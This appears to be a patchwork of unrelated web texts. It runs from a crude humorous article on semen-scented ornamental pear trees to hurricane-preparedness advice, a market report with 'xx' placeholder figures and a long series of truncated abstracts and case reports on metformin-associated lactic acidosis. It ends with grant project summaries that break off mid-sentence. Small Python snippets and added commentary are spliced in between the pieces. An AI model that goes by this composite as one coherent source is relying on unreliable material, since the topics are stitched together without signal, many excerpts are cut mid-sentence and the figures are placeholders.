You know the smell. It's that chlorine musk that reminds you of either narrowly dodging a pregnancy or being a 15-year-old boy. But it's a weird thing to be walking down the street on an early spring afternoon and get a nose full of jizz. You're looking around like, "What is that?"
The answer is trees. That cummy smell comes from a flowering deciduous tree called Pyrus calleryana, better known in Australia as the ornamental pear. Originating from China, they became the urban designer's tree of choice in the 1950s because they're small, neat, and produce cute white flowers. Ornamental pears now line city streets around the globe, although they've fallen out of fashion in Australia because they tend to self-germinate in vacant blocks—and, as mentioned, the jizz thing.
So what's with the smell? Basically they smell like that to attract insects. "Any time plants emit fragrances, it's typically to attract pollinators, and that's what the pear is doing as well," explained John Murgel, a horticulturist in Denver. "We normally associate sweet smells with trying to attract bees, but a lot of plants all over the world use really terrible smells in order to attract beetles and flies as pollinators."
In the world of chemistry these smells are known as "volatile amines," which basically means they're molecularly similar to ammonia. In the case of the ornamental pear, what you're smelling is trimethylamine and dimethylamine, both of which smell like ammonia. And the twist in the story is that there's ammonia in semen.
And just because we're here, talking about semen, I want to raise something personal for a moment. And that is how whenever anyone brings up semen trees, some sort of dude always invariably says, "Hahahaha, how do you know what semen smells like?"
You might have experienced this yourself. But I just want to quickly clarify that of all people, those dudes know exactly what semen smells like. And they know because they all spent long, fevered years exploring, and I know this because I was there, being one of them. For many of us, semen was a phase. And there was an even stranger phase when some guys in high school were tasting their own, just to see. I never went that far but I guess it's nice to keep as an option. Just for when I'm old and I've tried every other activity on the planet, including zorbing.
Anyway, the point is don't ask that question. It's dumb, and you already know the answer.
Now, back to the trees. And it's worth noting that smelly plants are fairly common. There's an entire subset of stinky plants called carrion flowers, or corpse flowers, which mimic the stench of decay to attract bugs that usually feast on rotting animals. Indonesia has produced many of the favourites, including Amorphophallus titanum, which has a long proboscis-like structure that heats up to further disperse its smell. Another example is Bulbophyllum, a kind of orchid found throughout Latin America and the Asia-Pacific. These guys are beautiful, but their scent is said to range from urine and blood all the way through to something sweet and fruity.
Closer to home now, and the good news is that ornamental pear trees won't stink for that much longer. As John Murgel explained, most bloom for just two weeks. "And if a tree is in a warmer, exposed site, it could already be flowering."
So enjoy them while you still can. Like memories of adolescence, the smell of semen trees is fleeting.
Julian is on Twitter, if you're into that kind of thing
On June 1, the hurricane season began in the Western Hemisphere. Every year, a number of named storms affect the eastern and southern coasts of the United States. My experience in public safety has taught me that there are three phases of every landfalling storm: before, during and after. I could probably write an article on each phase, but I will try to give some key points on each of these three phases.
Before the Storm
The fire service works in operational periods of time leading up to a landfalling storm. There are certain things that need to be checked in each operational period that may be needed during the storm. A few examples of the things that are checked or operated are emergency generators, station fuel levels and chain saws. I think that many people take preparatory steps before a landfalling storm, but I doubt that we take a planned approach. The first order of business is to determine what needs to be done before the storm arrives: things like filling gas tanks and gas cans, checking generators, stocking up on non-perishable foods and drinking water, procuring batteries for flashlights, making sure that propane tanks are full and ensuring that medical patients have what they need. It is important to heed warnings from weather and local officials prior to the storm. The steps taken before the storm should be done while conditions are calm, the power is still on, the wind is calm and the torrential rain is not yet falling. If you think that you will need something after the storm, then you will want to acquire it before the storm. You will also need to secure loose items that could be blown around.
During the Storm
Once the storm has hit, shelter in place. Most storms contain three dangerous elements: flooding rains, damaging sustained winds and tornadoes. If you live near the coast, then you will also need to be concerned about storm surge, especially around high tide. Some storms may be more of a rain event, while others may be more of a wind event, and some are both. Listening to and heeding the warnings issued might just save your life. If you are given the order to evacuate, do so; an evacuation plan should be determined prior to the storm's arrival. Do not go outside to look at the storm's fury. Many have been hurt or killed by falling tree branches or trees. If power lines come down, treat them as energized. Know where you will go in your home if a tornado warning is issued. If tornadoes are forecast, then people living in mobile homes must have an evacuation location to go to.
After the Storm
The period after the storm could last for two to three weeks. Infrastructure may be damaged. How will you live if the power is off for three days? How about seven or 14 days? How will you prevent your generator's exhaust from building up lethal levels of carbon monoxide? Trees could be wrapped with power lines. Roads may be blocked or washed out. Do not drive through water running across a roadway. Many people are hurt using chain saws and ladders after storms. If evacuated, stay out until conditions have been rendered safe. Patience will be key in dealing with the aftermath of a landfalling storm. Neighbors will need to help neighbors, especially elderly neighbors. Fire units, ambulances and police officers may be delayed due to blocked access or high call loads. One may have to live without creature comforts for an extended period of time. Steps taken before the storm may pay off after the storm. I remember the days after Hurricane Isabel when one could not find a chain saw to buy for 100 miles. Looking at the storm through the lens presented here may help people better survive it.
In this report, LP Information covers the present scenario (with the base year being 2017) and the growth prospects of the global Generic Sterile Injectable market for 2018-2023.
Generic sterile injectables are FDA-approved biologics used to treat many diseases and disorders across the healthcare industry. They are far less expensive than their branded counterparts and perform equally well, so they are in heavy demand and used in the majority of hospitals and clinics around the globe. However, owing to stringent FDA regulations on their production, keeping up with this demand has been a constant challenge for the key players in the global generic sterile injectable market.
The generic sterile injectable market is expected to gain steady traction in the foreseeable future, as sterile injectable products find application across a wide range of diseases and medical conditions. Manufacturers are focused on increasing production of generic sterile injectables to meet rising demand without compromising on quality.
Over the next five years, LPI (LP Information) projects that Generic Sterile Injectable will register a xx% CAGR in terms of revenue, reaching US$ xx million by 2023, up from US$ xx million in 2017.
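The xx% figure above is a standard compound annual growth rate between the 2017 and 2023 revenue figures. As a minimal sketch of the arithmetic (the report's actual values are redacted as "xx", so the numbers below are purely hypothetical):

```python
def cagr(start_value: float, end_value: float, years: int) -> float:
    """Compound annual growth rate between two figures `years` apart."""
    return (end_value / start_value) ** (1 / years) - 1

# Hypothetical illustration only: revenue growing from US$ 40,000 million
# (2017) to US$ 55,000 million (2023), i.e. over 6 years.
print(f"{cagr(40_000, 55_000, 6):.2%}")  # → 5.45%
```

The same formula run in reverse (compounding the start value at the stated rate) is how a reader can sanity-check any CAGR a report of this kind quotes.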
This report presents a comprehensive overview, market shares, and growth opportunities of the Generic Sterile Injectable market by product type, application, key manufacturers and key regions.
To calculate the market size, LP Information considers value and volume generated from the sales of the following segments:
Segmentation by product type:
- Monoclonal Antibodies
- Cytokines
- Insulin
- Peptide Hormones
- Vaccines
- Others
Segmentation by application:
- Hospitals
- Pharmacies
- Online Pharmacies
This report also splits the market by region:
- Americas
- - United States
- - Canada
- - Mexico
- - Brazil
- APAC
- - China
- - Japan
- - Korea
- - Southeast Asia
- - India
- - Australia
- Europe
- - Germany
- - France
- - UK
- - Italy
- - Russia
- - Spain
- Middle East & Africa
- - Egypt
- - South Africa
- - Israel
- - Turkey
- - GCC Countries
The report also presents the market competition landscape and a corresponding detailed analysis of the major vendor/manufacturers in the market. The key manufacturers covered in this report:
- 3M
- Baxter Inc
- Fresenius Kabi
- Pfizer/Hospira
- Novartis/Sandoz
- Teva
- Hikma
- Sun Pharma
- Dr. Reddy's
- Mylan
- AstraZeneca Plc
- Merck & Co., Inc
- Hellberg Safety Ab
In addition, this report discusses the key drivers influencing market growth, opportunities, the challenges and the risks faced by key manufacturers and the market as a whole. It also analyzes key emerging trends and their impact on present and future development.
Research objectives
- To study and analyze the global Generic Sterile Injectable consumption (value & volume) by key regions/countries, product type and application, with historical data from 2013 to 2017 and forecasts to 2023.
- To understand the structure of the Generic Sterile Injectable market by identifying its various subsegments.
- To focus on the key global Generic Sterile Injectable manufacturers: to define, describe and analyze their sales volume, value, market share, competitive landscape, SWOT analysis and development plans for the next few years.
- To analyze Generic Sterile Injectable submarkets with respect to individual growth trends, future prospects, and their contribution to the total market.
- To share detailed information about the key factors influencing the growth of the market (growth potential, opportunities, drivers, industry-specific challenges and risks).
- To project the consumption of Generic Sterile Injectable submarkets, with respect to key regions (along with their respective key countries).
- To analyze competitive developments such as expansions, agreements, new product launches, and acquisitions in the market.
- To strategically profile the key players and comprehensively analyze their growth strategies.
Review: Metformin-associated Lactic Acidosis: Current Perspectives on Causes and Risk
Abstract: Although metformin has become a drug of choice for the treatment of type 2 diabetes mellitus, some patients may not receive it owing to the risk of lactic acidosis. Metformin, along with other drugs in the biguanide class, increases plasma lactate levels in a plasma concentration-dependent manner by inhibiting mitochondrial respiration, predominantly in the liver. Elevated plasma metformin concentrations (as occur in individuals with renal impairment) and a secondary event or condition that further disrupts lactate production or clearance (e.g., cirrhosis, sepsis, or hypoperfusion) are typically necessary to cause metformin-associated lactic acidosis (MALA). As these secondary events may be unpredictable and the mortality rate for MALA approaches 50%, metformin has been contraindicated in moderate and severe renal impairment since its FDA approval in patients with normal renal function or mild renal insufficiency, to minimize the potential for toxic metformin levels and MALA. However, the reported incidence of lactic acidosis in clinical practice has proved to be very low (< 10 cases per 100,000 patient-years). Several groups have suggested that current renal function cutoffs for metformin are too conservative, thus depriving a substantial number of type 2 diabetes patients of the potential benefit of metformin therapy. On the other hand, the success of metformin as the first-line diabetes therapy may be a direct consequence of conservative labeling, the absence of which could have led to excess patient risk and eventual withdrawal from the market, as happened with earlier biguanide therapies. An investigational delayed-release metformin currently under development could potentially provide a treatment option for patients with renal impairment pending the resu…
Lactic Acidosis: What You Need To Know
Lactic acidosis is a form of metabolic acidosis that begins in the kidneys. People with lactic acidosis have kidneys that are unable to remove excess acid from their body. If lactic acid builds up in the body more quickly than it can be removed, acidity levels in bodily fluids — such as blood — spike. This buildup of acid causes an imbalance in the body's pH level, which should always be slightly alkaline rather than acidic. There are a few different types of acidosis. Lactic acid buildup occurs when there's not enough oxygen in the muscles to break down glucose and glycogen. This is called anaerobic metabolism. There are two types of lactic acid: L-lactate and D-lactate. Most forms of lactic acidosis are caused by too much L-lactate.
Lactic acidosis has many causes and can often be treated. But if left untreated, it may be life-threatening. The symptoms of lactic acidosis are typical of many health issues. If you experience any of these symptoms, you should contact your doctor immediately. Your doctor can help determine the root cause. Several symptoms of lactic acidosis represent a medical emergency: fruity-smelling breath (a possible indication of a serious complication of diabetes, called ketoacidosis); confusion; jaundice (yellowing of the skin or the whites of the eyes); and trouble breathing or shallow, rapid breathing. If you know or suspect that you have lactic acidosis and have any of these symptoms, call 911 or go to an emergency room right away.
Other lactic acidosis symptoms include: exhaustion or extreme fatigue, muscle cramps or pain, body weakness, overall feelings of physical discomfort, abdominal pain or discomfort, diarrhea, decrease in appetite, headache, and rapid heart rate. Lactic acidosis has a wide range of underlying causes, including carbon monoxide poisoning…
Severe Lactic Acidosis Reversed By Thiamine Within 24 Hours
Karin Amrein, Werner Ribitsch, Ronald Otto, Harald C Worm, Rudolf E Stauber — Department of Internal Medicine, Medical University of Graz, Auenbruggerplatz 15, A-8036 Graz, Austria
Thiamine is a water-soluble vitamin that plays a pivotal role in carbohydrate metabolism. In acute deficiency, pyruvate accumulates and is metabolized to lactate, and chronic deficiency may cause polyneuropathy and Wernicke encephalopathy. Classic symptoms include mental status change, ophthalmoplegia, and ataxia but are present in only a few patients [1]. Critically ill patients are prone to thiamine deficiency because of preexisting malnutrition, increased consumption in high-carbohydrate nutrition, and accelerated clearance in renal replacement therapy. In retrospective [2] and prospective [3, 4] studies, a substantial prevalence of thiamine deficiency has been described in both adult (10% to 20%) and pediatric (28%) patients. Thiamine deficiency may become clinically evident in any type of malnutrition that outlasts thiamine body stores (2 to 3 weeks), including alcoholism, bariatric surgery, or hyperemesis gravidarum, and results in high morbidity and mortality if untreated [1]. We report the case of a 56-year-old man with profound lactic acidosis that resolved rapidly after thiamine infusion. He was admitted because of a decreased level of consciousness (Glasgow Coma Scale score of 6). Vital signs, including blood pressure, heart rate, and oxygen saturation, were normal. Besides reporting regular alcohol consumption, relatives reported recen…
Mala: Metformin-associated Lactic Acidosis
By Charles W. O'Connell, MD
Introduction
Metformin is a first-line agent for type 2 diabetes mellitus, often used as monotherapy or in combination with oral diabetic medications. It is a member of the biguanide class, and its main intended effect is the inhibition of hepatic gluconeogenesis. In addition, metformin increases insulin sensitivity, enhances peripheral glucose utilization and decreases glucose uptake in the gastrointestinal tract. Phenformin, a previously used biguanide, was withdrawn from the market in the 1970s due to its association with numerous cases of lactic acidosis. Metformin is currently used extensively in the management of diabetes and is the most commonly prescribed biguanide worldwide. The therapeutic dosage of metformin ranges from 850 mg to a maximum of 3000 mg daily and is typically divided into twice-daily dosing. It is primarily used in the treatment of diabetes but has been used in other conditions associated with insulin resistance, such as polycystic ovarian syndrome. MALA is a rare but well-reported event that occurs with both therapeutic use and overdose states.
Case presentation
A 22-year-old female presents to the Emergency Department after being found alongside a suicide note by her family. She was thought to have taken an unknown but large amount of her husband's metformin. She arrives at the ED nearly 10 hours after ingestion. She was agitated but conversant. She reports having nausea and vague feelings of being unwell and is very distraught over the state of her critically ill husband. She has some self-inflicted superficial lacerations over her left anterior forearm. Her vital signs upon arrival were: T 98.9 degrees Fahrenheit, HR initially 140 bpm which improved to 110 bpm soon after arrival, BP 100/50, RR 22…
Causes Of Lactic Acidosis
INTRODUCTION AND DEFINITION
Lactate levels greater than 2 mmol/L represent hyperlactatemia, whereas lactic acidosis is generally defined as a serum lactate concentration above 4 mmol/L. Lactic acidosis is the most common cause of metabolic acidosis in hospitalized patients. Although the acidosis is usually associated with an elevated anion gap, moderately increased lactate levels can be observed with a normal anion gap (especially if hypoalbuminemia exists and the anion gap is not appropriately corrected). When lactic acidosis exists as an isolated acid-base disturbance, the arterial pH is reduced. However, other coexisting disorders can raise the pH into the normal range or even generate an elevated pH. (See "Approach to the adult with metabolic acidosis", section on 'Assessment of the serum anion gap' and "Simple and mixed acid-base disorders".)
Lactic acidosis occurs when lactic acid production exceeds lactic acid clearance. The increase in lactate production is usually caused by impaired tissue oxygenation, either from decreased oxygen delivery or a defect in mitochondrial oxygen utilization. (See "Approach to the adult with metabolic acidosis".) The pathophysiology and causes of lactic acidosis will be reviewed here. The possible role of bicarbonate therapy in such patients is discussed separately. (See "Bicarbonate therapy in lactic acidosis".)
PATHOPHYSIOLOGY
A review of the biochemistry of lactate generation and metabolism is important in understanding the pathogenesis of lactic acidosis [1]. Both overproduction and reduced metabolism of lactate appear to be operative in most patients. Cellular lactate generation is influenced by the "redox state" of the cell. The redox state in the cellular cytoplasm is reflected by the ratio of oxidized and reduced nicotinamide adenine dinucleotide…
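The numeric thresholds quoted above (lactate > 2 mmol/L for hyperlactatemia, > 4 mmol/L for lactic acidosis, acidemia at arterial pH < 7.35) can be sketched as a toy classifier. This is purely an illustration of the definitions, not a clinical tool; it deliberately ignores the mixed acid-base disorders the text warns can pull the pH back into the normal range:

```python
def classify(lactate_mmol_l: float, arterial_ph: float) -> str:
    """Toy classifier for the lactate thresholds quoted in the text.

    Illustration only: real diagnosis must account for mixed acid-base
    disorders, the anion gap, albumin correction, and clinical context.
    """
    if lactate_mmol_l > 4.0 and arterial_ph < 7.35:
        return "lactic acidosis"
    if lactate_mmol_l > 2.0:
        return "hyperlactatemia"
    return "lactate within quoted limits"

print(classify(5.2, 7.21))  # → lactic acidosis
print(classify(2.8, 7.40))  # → hyperlactatemia
```

Note how the second case illustrates the text's point: an elevated lactate with a normal pH is hyperlactatemia, not lactic acidosis, which is exactly why coexisting disorders can mask the acidosis.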
Metformin-related Lactic Acidosis: Case Report - Sciencedirect
Open Access funded by Sociedad Colombiana de Anestesiología y Reanimación.
Lactic acidosis is defined as the presence of pH < 7.35, blood lactate > 2.0 mmol/L and PaCO2 < 42 mmHg. However, the definition of severe lactic acidosis is controversial. The primary cause of severe lactic acidosis is shock. Although rare, metformin-related lactic acidosis is associated with a mortality as high as 50%. The treatment for metabolic acidosis, including lactic acidosis, may be specific or general, using sodium bicarbonate, trihydroxyaminomethane, carbicarb or continuous haemodiafiltration. The successful treatment of lactic acidosis depends on the control of the aetiological source. Intermittent or continuous renal replacement therapy is perfectly justified, shock being the argument for deciding which modality to use. We report a case of a male patient presenting with metformin poisoning as a result of attempted suicide, who developed lactic acidosis and multiple organ failure. The critical success factor was treatment with continuous haemodiafiltration.
Lactic Acidosis in Sepsis: It's Not All Anaerobic: Implications for Diagnosis and Management
1. Chest. 2016 Jan;149(1):252-61. doi: 10.1378/chest.15-1703. Epub 2016 Jan 6. Lactic Acidosis in Sepsis: It's Not All Anaerobic: Implications for Diagnosis and Management. (1) Centre for Heart Lung Innovation, University of British Columbia, Vancouver, BC, Canada. (2) Centre for Heart Lung Innovation, University of British Columbia, Vancouver, BC, Canada. Increased blood lactate concentration (hyperlactatemia) and lactic acidosis (hyperlactatemia and serum pH < 7.35) are common in patients with severe sepsis or septic shock and are associated with significant morbidity and mortality. In some patients, most of the lactate that is produced in shock states is due to inadequate oxygen delivery resulting in tissue hypoxia and causing anaerobic glycolysis. However, lactate formation during sepsis is not entirely related to tissue hypoxia or reversible by increasing oxygen delivery. In this review, we initially outline the metabolism of lactate and the etiology of lactic acidosis; we then address the pathophysiology of lactic acidosis in sepsis. We discuss the clinical implications of serum lactate measurement in diagnosis, monitoring, and prognostication in acute and intensive care settings. Finally, we explore treatment of lactic acidosis and its impact on clinical outcome. Copyright 2016 American College of Chest Physicians. Published by Elsevier Inc. All rights reserved.
Lactic Acidosis: Symptoms, Causes, And Treatment
Lactic acidosis occurs when the body produces too much lactic acid and cannot metabolize it quickly enough. The condition can be a medical emergency. The onset of lactic acidosis might be rapid and occur within minutes or hours, or gradual, happening over a period of days. The best way to treat lactic acidosis is to find out what has caused it. Untreated lactic acidosis can result in severe and life-threatening complications. In some instances, these can escalate rapidly. It is not necessarily a medical emergency when caused by over-exercising. The prognosis for lactic acidosis will depend on its underlying cause. A blood test is used to diagnose the condition. Lactic acidosis symptoms that may indicate a medical emergency include a rapid heart rate and disorientation. Typically, symptoms of lactic acidosis do not stand out as distinct on their own but can be indicative of a variety of health issues. However, some symptoms known to occur in lactic acidosis indicate a medical emergency. Lactic acidosis can occur in people whose kidneys are unable to get rid of excess acid. Even when not related to a kidney condition, some people's bodies make too much lactic acid and are unable to balance it out. Diabetes increases the risk of developing lactic acidosis. Lactic acidosis may develop in people with type 1 and type 2 diabetes mellitus, especially if their diabetes is not well controlled. There have been reports of lactic acidosis in people who take metformin, which is a standard non-insulin medication for treating type 2 diabetes mellitus. However, the incidence is low, at or below 10 cases per 100,000 patient-years of using the drug, according to a 2014 report in the journal Metabolism. The incidence of lactic acidosis is higher in people with diabetes who…
Metformin And Fatal Lactic Acidosis
Publications. Published: July 1998.
Dr P Pillans, former Medical Assessor, Centre for Adverse Reactions Monitoring (CARM), Dunedin
Metformin is a useful anti-hyperglycaemic agent, but significant mortality is associated with drug-induced lactic acidosis. Significant renal and hepatic disease, alcoholism and conditions associated with hypoxia (e.g. cardiac and pulmonary disease, surgery) are contraindications to the use of metformin. Other risk factors for metformin-induced lactic acidosis are sepsis, dehydration, high dosages and increasing age. Metformin remains a major reported cause of drug-associated mortality in New Zealand. Of the 12 cases of lactic acidosis associated with metformin reported to CARM since 1977, 2 occurred in the last year and 8 cases had a fatal outcome.
Metformin useful but small risk of potentially fatal lactic acidosis
Metformin is a useful therapeutic agent for obese non-insulin dependent diabetics and those whose glycaemia cannot be controlled by sulphonylurea monotherapy. Lactic acidosis is an uncommon but potentially fatal adverse effect. The reported frequency of lactic acidosis is 0.06 per 1000 patient-years, mostly in patients with predisposing factors.1 Examples of metformin-induced lactic acidosis cases reported to CARM include: A 69-year-old man, with renal and cardiac disease, was prescribed metformin due to failing glycaemic control on glibenclamide monotherapy. He was well for six weeks, then developed lactic acidosis and died within 3 days. Post-surgical lactic acidosis caused the death of a 70-year-old man whose metformin was not withdrawn at the time of surgery. A 56-year-old woman, with no predisposing disease, died from lactic acidosis following major…
Glyburide And Metformin (oral Route)
Precautions (drug information provided by Micromedex): It is very important that your doctor check your progress at regular visits to make sure this medicine is working properly. Blood tests may be needed to check for unwanted effects. Under certain conditions, too much metformin can cause lactic acidosis. The symptoms of lactic acidosis are severe and quick to appear. They usually occur when other health problems not related to the medicine are present and very severe, such as a heart attack or kidney failure. The symptoms of lactic acidosis include abdominal or stomach discomfort; decreased appetite; diarrhea; fast, shallow breathing; a general feeling of discomfort; muscle pain or cramping; and unusual sleepiness, tiredness, or weakness. If you have any symptoms of lactic acidosis, get emergency medical help right away. It is very important to carefully follow any instructions from your health care team about: Alcohol—Drinking alcohol may cause severe low blood sugar. Discuss this with your health care team. Other medicines—Do not take other medicines unless they have been discussed with your doctor. This especially includes nonprescription medicines such as aspirin, and medicines for appetite control, asthma, colds, cough, hay fever, or sinus problems. Counseling—Other family members need to learn how to prevent side effects or help with side effects if they occur. Also, patients with diabetes may need special counseling about diabetes medicine dosing changes that might occur because of lifestyle changes, such as changes in exercise and diet. Furthermore, counseling on contraception and pregnancy may be needed because of the problems that can occur in patients with diabetes during pregnancy. Travel—Keep your recent prescription and your medical history with you…
Lactic Acidosis: Diagnosis And Treatment
Measurements of blood lactate levels can be very useful for detecting the presence of tissue underperfusion and for guiding therapy. Increased blood lactate levels usually reflect an imbalance between the oxygen demand and the oxygen supply to the cells, but other conditions may also be responsible. The present chapter first reviews the biochemistry of blood lactate, then reviews the clinical conditions associated with hyperlactatemia and finally discusses some therapeutic implications.
Lactic Acidosis And Exercise: What You Need To Know
Muscle ache, burning, rapid breathing, nausea, stomach pain: if you've experienced the unpleasant feeling of lactic acidosis, you likely remember it. It's temporary. It happens when too much acid builds up in your bloodstream. The most common reason it happens is intense exercise.

Symptoms

The symptoms may include a burning feeling in your muscles, cramps, nausea, weakness, and feeling exhausted. It's your body's way of telling you to stop what you're doing. The symptoms happen in the moment. The soreness you sometimes feel in your muscles a day or two after an intense workout isn't from lactic acidosis; it's your muscles recovering from the workout you gave them.

Intense Exercise

When you exercise, your body uses oxygen to break down glucose for energy. During intense exercise, there may not be enough oxygen available to complete the process, so a substance called lactate is made. Your body can convert this lactate to energy without using oxygen, but this lactate, or lactic acid, can build up in your bloodstream faster than you can burn it off. The point when lactic acid starts to build up is called the "lactate threshold."

Some medical conditions can also bring on lactic acidosis, including vitamin B deficiency and shock. Some drugs, including metformin, a drug used to treat diabetes, and all nucleoside reverse transcriptase inhibitor (NRTI) drugs used to treat HIV/AIDS, can cause lactic acidosis. If you are on any of these medications and have any symptoms of lactic acidosis, get medical help immediately.

Preventing Lactic Acidosis

Begin any exercise routine gradually. Pace yourself. Don't go from being a couch potato to trying to run a marathon in a week. Start with an aerobic exercise like running or fast walking, and build up your pace and distance slowly.
Life Threatening Lactic Acidosis
M Lemyze, specialist registrar in critical care medicine 1; J F Baudry, specialist registrar in critical care medicine 2; F Collet, specialist registrar in critical care medicine 2; N Guinard, specialist registrar in critical care medicine 2. 1 Department of Critical Care Medicine, Schaffner Hospital, 62300 Lens, France; 2 Department of Critical Care Medicine, Broussais Hospital, 35400 Saint Malo, France. Correspondence to: M Lemyze, malcolmlemyze{at}yahoo.fr

An 83 year old woman with diabetes presented to the emergency department with progressive shortness of breath and a two week history of diarrhoea. Her drugs included aspirin, 75 mg four times a day; a combination of irbesartan with hydrochlorothiazide, 300/25 mg four times a day; and metformin, 1000 mg three times a day. She had no previously known renal insufficiency, but on arrival she was oliguric, disoriented, and confused. Her respiratory rate was 32 breaths/min, blood pressure was 76/46 mm Hg, heart rate was 125 beats/min, and rectal temperature reached 36.8°C. She had cool and clammy extremities and a persistent skin fold, additional evidence of severe dehydration. Arterial blood gases showed a profound lactic acidosis, with pH 6.72, partial pressure of carbon dioxide (PCO2) 14 mm Hg, partial pressure of oxygen (PO2) 106 mm Hg, bicarbonate 12 mmol/l, and a high lactate concentration of 17.4 mmol/l. Laboratory results showed a normal blood glucose concentration of 9 mmol/l, a serum urea of 22 mmol/l, a serum creatinine of 779 µmol/l, an increased serum potassium concentration of 6.8 mmol/l, and a decreased prothrombin activity of 43% (prothrombin time of 21 seconds). Chest and abdominal examination, chest radiography, urine dipstick, plasma C reactive protein (<5 mg/l), and procalcitonin (<0.5 µg/l) concentrations...
Differential Diagnosis Of Elevated Serum Lactate 1,2
Sinus tachycardia, LVH, secondary repolarization abnormalities. No evidence of central pulmonary embolism, thoracic aortic dissection, or thoracic aortic aneurysm. Evaluation of the peripheral vessels is limited due to motion artifact. No focal consolidation or pneumothorax. No evidence of intra-abdominal abscess or definite source of infection. Marked hepatic steatosis. Diffuse circumferential subcutaneous edema involving both lower extremities from the level of the mid thighs distally through the feet. There are bilateral subcutaneous calcifications which are likely venous calcifications in the setting of chronic venous stasis disease. There is some overlying skin thickening. There is moderate concentric left ventricular hypertrophy with hyperdynamic LV wall motion. The ejection fraction estimate is >70%. Grade I/IV (mild) LV diastolic dysfunction. No hemodynamically significant valve abnormalities. Hepatomegaly, echogenic liver suggesting fatty infiltration. Moderately blunted hepatic vein waveforms suggesting decreased hepatic parenchymal compliance.

The patient was admitted to the cardiology service for management of NSTEMI and evaluation of undiagnosed CHF. She was started on a heparin continuous infusion. In addition, a CT pulmonary angiogram was obtained to evaluate for pulmonary embolism as an explanation of her progressive dyspnea on exertion. No PE, consolidation or effusion was identified. Despite the patient's reported history of congestive heart failure, there was no evidence that her symptoms were a result of an acute exacerbation, with only a mildly elevated BNP but no jugular venous distension or evidence of pulmonary edema. The patient's significant lower extremity edema was more suggestive of chronic venous stasis.
Lactic Acidosis
Lactic acidosis is a medical condition characterized by the buildup of lactate (especially L-lactate) in the body, which results in an excessively low pH in the bloodstream. It is a form of metabolic acidosis, in which excessive acid accumulates due to a problem with the body's metabolism of lactic acid.

Lactic acidosis is typically the result of an underlying acute or chronic medical condition, medication, or poisoning. The symptoms are generally attributable to these underlying causes, but may include nausea, vomiting, rapid deep breathing, and generalised weakness. The diagnosis is made on biochemical analysis of blood (often initially on arterial blood gas samples), and once confirmed, generally prompts an investigation to establish the underlying cause to treat the acidosis. In some situations, hemofiltration (purification of the blood) is temporarily required. In rare chronic forms of lactic acidosis caused by mitochondrial disease, a specific diet or dichloroacetate may be used. The prognosis of lactic acidosis depends largely on the underlying cause; in some situations (such as severe infections), it indicates an increased risk of death.

Classification

The Cohen-Woods classification categorizes causes of lactic acidosis as:[1]

- Type A: Decreased tissue oxygenation (e.g., from decreased blood flow)
- Type B
  - B1: Underlying diseases (sometimes causing type A)
  - B2: Medication or intoxication
  - B3: Inborn error of metabolism

Signs and symptoms

Lactic acidosis is commonly found in people who are unwell, such as those with severe heart and/or lung disease, a severe infection with sepsis, the systemic inflammatory response syndrome due to another cause, severe physical trauma, or severe depletion of body fluids.[2] Symptoms in humans include all those of typical metabolic acidosis.
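The Cohen-Woods taxonomy above is simple enough to capture as a lookup table. A minimal Python sketch, purely illustrative and not a clinical tool:

```python
# Cohen-Woods classification of lactic acidosis, encoded as a lookup table.
COHEN_WOODS = {
    "A":  "Decreased tissue oxygenation (e.g., from decreased blood flow)",
    "B1": "Underlying diseases (sometimes causing type A)",
    "B2": "Medication or intoxication",
    "B3": "Inborn error of metabolism",
}

def describe(subtype: str) -> str:
    """Return the description for a Cohen-Woods subtype, e.g. 'B2'."""
    return COHEN_WOODS[subtype.upper()]

print(describe("b2"))  # Medication or intoxication
```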
2018 Pilot Projects Understanding the Factors Influencing Exposures from Tobacco Usage among Young Adults in the Minority Communities Principal Investigator: Hsu, Ping-Ching, Ph.D., M.S.
Young adults (YA) aged 18-26 have the highest rate of trying new and emerging tobacco products such as electronic nicotine delivery systems (ENDS). Dual use of ENDS with other tobacco products such as cigarettes and smokeless tobacco (ST) is common among YAs, who are at the critical stage in the development of regular tobacco use behavior. Dual use can increase the abuse liability of tobacco products, prolong frequency and intensity of use, and increase exposure to tobacco toxins. However, there is limited understanding of how individual factors such as nicotine dependence, smoking topography, and nicotine metabolism influence nicotine intake and exposure to tobacco toxins in YAs, particularly among those who live in rural Southern communities where smoking-attributable cancers are among the highest in the U.S. Our long-term goal is to generate innovative data that will inform tobacco regulatory policy related to how dual user consumption patterns influence toxicant exposure. Consistent with the Arkansas Center for Health Disparities (ARCHD) theme, the specific goal of this study is to investigate individual factors that will influence tobacco use behavior among socially disadvantaged YA who live in the Arkansas Phillips County where 62% of the population are African Americans. This study will use social network and community-engaged research methods to recruit traditionally hard-to-reach underserved YAs. We hypothesize that YAs who use multiple products (e.g., cig+ENDS or cig+ST) will have higher nicotine dependence than single users, resulting in longer and deeper puff profiles and greater toxicant exposures than single users. This study includes vulnerable populations defined by the Food and Drug Administration (minorities, YA, poor, and geographically isolated group), which has expressed an interest in better understanding how to reduce the toxicity and carcinogenicity of tobacco products. 
Therefore, we have the potential to have a huge impact on addressing tobacco-caused disparities.
Our aims are to:

Aim 1. Evaluate the smoking topography and nicotine dependence for YA smokers, ST, ENDS, and dual users.
Aim 2. Determine the differences in the toxicant exposure in saliva using targeted metabolomics, as well as the nicotine metabolic ratio for the above groups.

Cytogenetic and Epigenetic Alterations as a Result of Exposure to Ionizing Radiation in Northwest Arkansas Marshallese
Principal Investigator: Igor Koturbash, M.D., Ph.D.
As a result of nuclear weapons testing in the northern Marshall Islands in the middle of the twentieth century, thousands of Marshallese were exposed to ionizing radiation and numerous islands were contaminated as a result of radioactive fallout. Increased cancer incidence and metabolic syndrome have been reported in residents of the Republic of the Marshall Islands, and many more radiation-induced cancers are expected to emerge due to the latency of cancer
development. In this study, we will investigate the genetic and epigenetic effects of exposure to ionizing radiation that are associated with cancer and metabolic syndrome development among the Marshallese population in Northwest Arkansas.

Specific Aims

Specific Aim 1. Determine whether exposures to IR are associated with stable chromosomal aberrations in peripheral lymphocytes of NWA Marshallese.
Using innovative and sensitive methodology (multiple fluorescence in situ hybridization [mFISH]), we will analyze and compare chromosomal aberrations in lymphocytes from NWA Marshallese and from matched control subjects. This will allow us to identify persistent cytogenetic aberrations associated with the exposure to IR, and the proposed method will provide much greater resolution than conventional cytogenetic techniques.
Specific Aim 2. Determine whether exposures to IR are associated with altered levels of LINE-1 DNA methylation in peripheral lymphocytes of NWA Marshallese. Using new methodology developed in our laboratory, we will examine and compare the DNA methylation status of 12 LINE-1 elements that belong to different evolutionary lineages. Results from samples of NWA Marshallese will be compared to those from
